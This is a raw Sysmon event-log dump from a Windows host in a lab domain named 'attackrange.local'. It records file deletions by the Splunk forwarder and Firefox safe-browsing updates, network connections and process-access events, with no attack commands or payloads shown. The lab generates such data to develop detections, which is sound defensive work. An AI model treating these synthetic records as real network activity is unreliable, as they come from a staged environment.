Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99E4E709CE0A968C4B80A7EF502567E6,SHA256=C2B0AEAFF335ADB131A6BCDD13715663AD85A1083B57B812622D96CE68FC9884,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:33.202{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=325286DA608760D0C1F09987E24230EE,SHA256=D49A8A98BE67E02F24B2BBB6F0B3F1F551A7D1B6D8F8E31B2171D1AC5F5A031E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:34.216{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7EF4B633B1D98FCEBF7D741DFBB9D29,SHA256=76B4A1175072EC5FD3C4909124399D1E44CAF81160F73D7B664D1A2D31169131,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:00.900{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62221-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:00.216{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62220-false10.0.1.12-8000- 23542300x800000000000000035128932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:35.765{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2DBF36E8DDF02B3D7C4BA41978DBA9C7,SHA256=8C21FC646999D32D6AB0284717ED6C8B9E1F17A3A72416AAB17E4A64B703C681,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:35.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE1A417300633E149166125DA3E83DB7,SHA256=057A4EF680DB61F6F166B6587AD61C7EDF331175503BD4EA8749EF5F49F80A2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:36.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC169C36C3CB7BA6B8D8AFBACB278AA,SHA256=958D534F5E7E9673B58655284EF9611C09085FA60A1A315372E60EC2418BB078,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:37.995{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E895E0F8CE97C96DC1040FFE17D93C05,SHA256=6BC4AFF97BB2B5A418A93ACE6EFBB3DBA41C76C7F4148DA0C53B8F7E51AA329A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:37.415{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDDAA27BB97B3408E74B1EF7E80BC1F8,SHA256=4528307FFDAB15E2743B13A487010DED3247DE4AD9EFBABD24A36DD8DCECF196,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.993{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=8CDB1D1B1E1C56A1BFDB4927B5B9D1D0,SHA256=308EB28D7598014B9845BEE948DEEA3642E9B222E363F707E09AAC04C0D90BF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.993{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=A4D6A607897A60DC61C817DD91EAF45C,SHA256=3894C825F90C2D5BDCABEB0FDA5646EA60CBFF64E876CE7C91880951EC5BBC43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.993{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.993{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=8DC78A562E1B268958A981D0AD7EAD74,SHA256=2A960282D759EAE224A8A47ABAD7A54DF042460DF0E5AC83A793FA822615FB83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.993{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=F40BF8D82BE3C4934C8867E828396FAA,SHA256=B5512C57E0877503317E0E47B9D774889F60E2C88D682B4B51D20542D0534525,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.978{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=BA59A19E6E2363D1691A1F4F46EBA3DD,SHA256=899AB2E0138F9C50C674096F6CD49D22BB3469BD13F6E9C09750961AAC0D3F8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.978{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=5A35E65CADA1885B6796D1B3FE56E5F8,SHA256=35A1BF0FF6DD2B70DA5F89611891D413808DDE1510D03D788FF48A214AFA7CDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=E72E6B0165636DAE364CC43097FCD4E9,SHA256=3FE594D286D351B102E94676FD8A91B8FA0B3FDDD151336DDCE8C9BA2CFCFB50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=318288F5909637E0C3285C0942D72FF4,SHA256=F2BB9D40F7237C0E6D8EA96DFA2E864BD1264EB191C52BDBF16488D9466BC300,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=F7A173C65979416711FAFF47FADFBB44,SHA256=7F018CC32CF471750B6C5322E27E4F1C38097C414E7C6DC6AF9CF31E607431A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=5C71167AC9642FCF7752093F77FBBC89,SHA256=6714F7FBADCCB013DA1D8ECEFA6368A7D193E1F2460477F8AC304EDCF8637AA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=BFED06667174B0D03EE7F88A3DDC9A8C,SHA256=7AE5584755089D28C3A52DCF1EB86E62D4F2E377D61A7D549C6D4EBD53F39B26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=E6AAB64DC2799B4ECC6A6D18F86BD283,SHA256=D72FA31B50E9164371C5B7A3CCA257B99CE12D900FB07DEF942361D76299F5FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=16E5F327975AC215E9EFA4A4FC5262F5,SHA256=4698D628493E91E42494C8343B7E6469DFC1BFB1F771258C2FB556E84EF314B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=C3757E7620737B3B6500073B370852FE,SHA256=34B07244F673343E9AC1C775B455C0A60AA95439E83A70B0C6A24E504A88F4B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=8D9E3EEEE577DCE4B0062413A081F9F2,SHA256=D0E3356B67A0BB9BD101D87FA6E23EC2699CC8A25564CD88076663DACF73A9CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.962{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=2CC22CF356532158115AB8A0851A9A80,SHA256=6B106FD00C6E27909C9779448E5BDA5FFB96FE2A6FF42636A662AB411D9906DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.946{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=BA59A19E6E2363D1691A1F4F46EBA3DD,SHA256=899AB2E0138F9C50C674096F6CD49D22BB3469BD13F6E9C09750961AAC0D3F8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.931{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:03.869{B81B27B7-5BF5-611D-6D04-00000000C801}5004C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62223-false142.250.217.106sea09s30-in-f10.1e100.net443https 354300x800000000000000035128970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:03.830{B81B27B7-5BF5-611D-6D04-00000000C801}5004C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62222-false104.16.248.249-443https 10341000x800000000000000035128969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.878{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.878{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-8406-613A-ED96-03000000C801}2844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.862{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=15D5921377FCEF599FDE37CE6FB16C95,SHA256=5AD5FED6F96F93822D87110665DD612CDF37130CA262B7DE59D1D3A78F1B11D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.847{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.847{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=A4D6A607897A60DC61C817DD91EAF45C,SHA256=3894C825F90C2D5BDCABEB0FDA5646EA60CBFF64E876CE7C91880951EC5BBC43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:38.847{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 